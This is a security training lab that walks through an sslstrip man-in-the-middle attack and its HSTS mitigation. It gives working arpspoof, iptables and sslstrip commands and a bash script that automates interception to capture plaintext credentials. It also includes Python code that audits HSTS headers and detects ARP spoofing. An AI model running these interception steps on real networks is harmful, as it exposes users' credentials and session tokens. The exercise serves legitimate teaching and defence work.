Exercise 32: Simulating MITM Attacks with SSL Strip

Feb 28, 2025

Objective

Simulate a Man-in-the-Middle (MITM) attack using sslstrip to downgrade HTTPS traffic to HTTP, capture unencrypted data, and understand how HSTS mitigates such attacks.


Scenario

As a cybersecurity analyst, understanding how attackers intercept secure communications is critical. In this exercise, you will simulate a MITM attack using sslstrip to downgrade HTTPS traffic to HTTP. You will capture and analyze unencrypted data with Wireshark and explore how HSTS (HTTP Strict Transport Security) prevents such attacks.

⚠️ Important: This exercise must only be performed in a legal and controlled lab environment. Unauthorized MITM attacks are illegal and unethical.


Lab Instructions

Step 1: Set Up the Lab Environment

  • Attacker Machine: Linux system with sslstrip, iptables, and Wireshark installed.
  • Victim Machine: Device connected to the same network as the attacker.
  • Router/Access Point: To route traffic between devices.

Step 2: Install Required Tools

a. Install sslstrip

sudo apt update
sudo apt install sslstrip -y

b. Install Wireshark

sudo apt install wireshark -y

Step 3: Enable IP Forwarding on the Attacker Machine

sudo sysctl -w net.ipv4.ip_forward=1

Step 4: Set Up iptables for Traffic Redirection

  • Redirect HTTP (port 80) traffic to sslstrip:
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Step 5: Launch ARP Spoofing

  • Install arpspoof if not already installed:
sudo apt install dsniff -y
  • Start ARP spoofing to redirect traffic between the victim and the router:
sudo arpspoof -i wlan0 -t <victim-ip> <gateway-ip>
sudo arpspoof -i wlan0 -t <gateway-ip> <victim-ip>

Step 6: Run sslstrip to Intercept Traffic

sudo sslstrip -l 8080

Step 7: Capture Traffic Using Wireshark

  • Open Wireshark on the Attacker Machine.
  • Start capturing traffic on the interface (wlan0 or eth0).
  • Apply the filter to observe HTTP traffic:
http
  • Monitor for intercepted credentials and other sensitive data.

Step 8: Analyze the Captured Data

  • Review captured packets for:
    • Usernames and passwords sent over HTTP.
    • URLs accessed by the victim.
  • Expected Result: SSL/TLS traffic downgraded to HTTP, exposing sensitive data.

Step 9: Discuss HSTS Mitigation

  • HSTS (HTTP Strict Transport Security) instructs browsers to use HTTPS only for a host, for the period given in max-age.
  • Once a browser has seen the header over HTTPS (or the site is on the browser's preload list), it rewrites http:// requests to https:// before sending them, so there is no plaintext request for sslstrip to intercept.
  • Example HTTP response header:
Strict-Transport-Security: max-age=31536000; includeSubDomains

Step 10: Mitigation Strategies

  1. Implement HSTS: Ensure websites use HSTS headers.
  2. Use HTTPS Everywhere: Browser extensions or the browser's built-in HTTPS-only mode enforce HTTPS connections.
  3. Monitor Network Traffic: Deploy IDS/IPS to detect ARP spoofing.
  4. Public Key Pinning: Prevent certificate forgery.

Solution & Explanation

How sslstrip Works

  • sslstrip intercepts the victim's plaintext HTTP requests and rewrites the server's HTTPS links and redirects to HTTP, so the victim never switches to HTTPS.
  • The attacker keeps a normal HTTPS connection to the server and relays the responses to the victim over plain HTTP, so the victim's side of the session is unencrypted.

Impact of the Attack

  • Credentials Exposure: Login information transmitted in plaintext.
  • Data Theft: Sensitive data like session tokens can be intercepted.
  • User Deception: Victims believe they’re on secure HTTPS sites.

Role of HSTS in Mitigation

  • Enforces HTTPS: Browsers internally upgrade http:// URLs to https:// for HSTS-enabled sites and refuse to proceed past certificate errors.
  • Prevents Downgrade Attacks: No plaintext request is sent, so sslstrip has nothing to rewrite.
  • Example: Websites like Google and Facebook use HSTS.

Testing & Verification

  • Confirm that SSL/TLS traffic is downgraded to HTTP without HSTS.
  • Access an HSTS-enabled site and verify the attack fails.
  • Monitor Wireshark for unencrypted data.

Verify HSTS Header

curl -I https://example.com | grep -i strict-transport-security
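The following script is an added example for this exercise, not code from sslstrip, curl or any browser. It does two things the text describes: it parses and audits a Strict-Transport-Security value (the string after the colon in the curl output above) and it models the browser-side HSTS cache from Step 9 to show why an http:// navigation to a remembered host never leaves the browser in plaintext. Hostnames, header values and timestamps are constructed; `ONE_YEAR` as the audit threshold is this example's assumption, not a browser rule.

```python
"""Audit an HSTS header and model the browser HSTS cache that defeats SSL stripping.
Added example for this exercise; not code from sslstrip, curl or any browser.
All hostnames and header values below are constructed."""
import time
from dataclasses import dataclass
from typing import Optional, List, Dict, Tuple
from urllib.parse import urlsplit, urlunsplit

ONE_YEAR = 31536000  # seconds; the audit threshold assumed by this example


@dataclass
class HstsPolicy:
    max_age: int
    include_subdomains: bool
    preload: bool


def parse_hsts(header: str) -> Optional[HstsPolicy]:
    """Parse a Strict-Transport-Security value (RFC 6797 directive syntax).
    Returns None when the header is unusable, i.e. max-age is missing or not a number,
    which is exactly when a browser would ignore it."""
    max_age = None
    include_subdomains = False
    preload = False
    for directive in header.split(";"):
        name, _, value = directive.strip().partition("=")
        name = name.strip().lower()
        value = value.strip().strip('"')
        if name == "max-age":
            if not value.isdigit():
                return None
            max_age = int(value)
        elif name == "includesubdomains":
            include_subdomains = True
        elif name == "preload":
            preload = True
    if max_age is None:
        return None
    return HstsPolicy(max_age, include_subdomains, preload)


def hsts_findings(header: str) -> List[str]:
    """Return audit findings for a header value; an empty list means acceptable."""
    policy = parse_hsts(header)
    if policy is None:
        return ["missing or invalid max-age: browsers ignore this header"]
    findings = []
    if policy.max_age == 0:
        findings.append("max-age=0 clears the policy; host is strippable again")
    elif policy.max_age < ONE_YEAR:
        findings.append(f"max-age {policy.max_age} is below one year")
    if not policy.include_subdomains:
        findings.append("includeSubDomains absent: subdomains remain strippable")
    return findings


class BrowserHstsCache:
    """Minimal model of a browser HSTS store: host -> (expiry, include_subdomains)."""

    def __init__(self) -> None:
        self.store: Dict[str, Tuple[float, bool]] = {}

    def observe_https_response(self, host: str, header: str, now: Optional[float] = None) -> None:
        """Record a policy. Only responses received over HTTPS may set HSTS (RFC 6797 8.1),
        so the caller must only pass headers seen on TLS connections."""
        now = time.time() if now is None else now
        policy = parse_hsts(header)
        if policy is None:
            return
        if policy.max_age == 0:
            self.store.pop(host, None)
            return
        self.store[host] = (now + policy.max_age, policy.include_subdomains)

    def is_known_host(self, host: str, now: Optional[float] = None) -> bool:
        """True if host, or a parent domain with includeSubDomains, has an unexpired policy."""
        now = time.time() if now is None else now
        labels = host.lower().split(".")
        for i in range(len(labels)):
            entry = self.store.get(".".join(labels[i:]))
            if entry is None or entry[0] <= now:
                continue
            if i == 0 or entry[1]:
                return True
        return False

    def navigate(self, url: str, now: Optional[float] = None) -> str:
        """Return the URL the browser actually requests: http:// is upgraded for known hosts."""
        parts = urlsplit(url)
        if parts.scheme == "http" and parts.hostname and self.is_known_host(parts.hostname, now):
            return urlunsplit(parts._replace(scheme="https"))
        return url
```

The first visit before any policy is cached is the window the exercise exploits; after one HTTPS response carrying the header the same http:// URL is upgraded locally, and after max-age elapses the host is strippable again unless the header has been refreshed.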

Security Best Practices

  1. Enable HSTS: Protect websites from SSL stripping.
  2. Deploy Network Monitoring: Detect ARP spoofing and MITM attacks.
  3. Use Strong Encryption: Enforce TLS 1.2/1.3 and disable insecure protocols.
  4. Educate Users: Raise awareness about HTTPS indicators.
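To make the monitoring recommendation in Step 10 and in the best practices above concrete, here is an added example of the detection logic a network monitor would run; it is not code from any IDS or from this exercise. It parses ARP replies in the format printed by `tcpdump -n arp` and raises an alert whenever a sender IP that is already bound to one MAC is claimed by a different one, which is the on-the-wire footprint of the arpspoof step. The tcpdump lines, addresses and the gateway IP are constructed sample data.

```python
"""Detect ARP spoofing from IP-to-MAC conflicts in ARP replies.
Added example; not code from any IDS or from this exercise.
The sample tcpdump lines and all addresses below are constructed."""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Constructed sample in the style of `tcpdump -n arp`. The gateway 192.168.1.1 is
# legitimately at aa:bb:cc:00:00:01; from 12:00:12 a second MAC claims the gateway's
# IP and then the host's IP, the pattern produced by the two arpspoof commands.
SAMPLE_TCPDUMP_LINES = [
    "12:00:10.000000 ARP, Reply 192.168.1.1 is-at aa:bb:cc:00:00:01, length 28",
    "12:00:10.000100 ARP, Request who-has 192.168.1.1 tell 192.168.1.50, length 28",
    "12:00:10.000200 ARP, Reply 192.168.1.50 is-at aa:bb:cc:00:00:50, length 28",
    "12:00:11.000000 ARP, Reply 192.168.1.1 is-at aa:bb:cc:00:00:01, length 28",
    "12:00:12.000000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28",
    "12:00:13.000000 ARP, Reply 192.168.1.50 is-at de:ad:be:ef:00:99, length 28",
    "12:00:14.000000 ARP, Reply 192.168.1.1 is-at aa:bb:cc:00:00:01, length 28",
]

GATEWAY_IP = "192.168.1.1"  # constructed; in practice taken from the DHCP/router config

ARP_REPLY_RE = re.compile(
    r"^(?P<ts>\S+) ARP, Reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is-at (?P<mac>[0-9a-fA-F:]{17})"
)


def parse_tcpdump_arp(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Extract (timestamp, sender_ip, sender_mac) from ARP Reply lines; requests are skipped."""
    replies = []
    for line in lines:
        m = ARP_REPLY_RE.match(line.strip())
        if m:
            replies.append((m.group("ts"), m.group("ip"), m.group("mac").lower()))
    return replies


def detect_arp_conflicts(replies: List[Tuple[str, str, str]],
                         known_bindings: Optional[Dict[str, str]] = None) -> List[dict]:
    """Alert on every reply whose sender IP is already bound to a different MAC.
    Bindings are trust-on-first-use, like an OS ARP cache; known_bindings can seed
    trusted pairs (e.g. the gateway) so a rogue first reply is caught as well."""
    bindings = {ip: mac.lower() for ip, mac in (known_bindings or {}).items()}
    alerts = []
    for ts, ip, mac in replies:
        seen = bindings.get(ip)
        if seen is None:
            bindings[ip] = mac
        elif seen != mac:
            alerts.append({
                "time": ts,
                "ip": ip,
                "expected_mac": seen,
                "claimed_by": mac,
                "severity": "critical" if ip == GATEWAY_IP else "high",
            })
    return alerts


def suspect_macs(alerts: List[dict]) -> Dict[str, List[str]]:
    """Group alerts by the claiming MAC. One MAC claiming both the gateway and a host
    address is the bidirectional signature of the arpspoof pair in Step 5."""
    claims = defaultdict(set)
    for alert in alerts:
        claims[alert["claimed_by"]].add(alert["ip"])
    return {mac: sorted(ips) for mac, ips in claims.items()}


if __name__ == "__main__":
    found = detect_arp_conflicts(parse_tcpdump_arp(SAMPLE_TCPDUMP_LINES))
    for alert in found:
        print(f"[{alert['severity']}] {alert['time']} {alert['ip']} moved from "
              f"{alert['expected_mac']} to {alert['claimed_by']}")
    print("suspect MACs:", suspect_macs(found))
```

Seeding `known_bindings` with the gateway's real MAC matters: without it, a rogue reply that arrives before the legitimate one would be trusted on first use and the genuine gateway would be the one flagged.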

Additional Script (Optional)

Automate sslstrip and ARP spoofing setup:

#!/bin/bash
# SSLStrip MITM Attack Automation Script

# Enable IP forwarding
sudo sysctl -w net.ipv4.ip_forward=1

# Redirect HTTP traffic to sslstrip
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

# Start ARP spoofing
xterm -e "sudo arpspoof -i wlan0 -t <victim-ip> <gateway-ip>" &
xterm -e "sudo arpspoof -i wlan0 -t <gateway-ip> <victim-ip>" &

# Start sslstrip
sudo sslstrip -l 8080

Run the script:

chmod +x sslstrip_attack.sh
sudo ./sslstrip_attack.sh

Conclusion

In this exercise, you simulated a MITM attack using sslstrip to downgrade HTTPS traffic to HTTP. You captured and analyzed unencrypted data and explored how HSTS mitigates such attacks. Understanding these vulnerabilities is crucial for implementing secure web practices and protecting sensitive information.
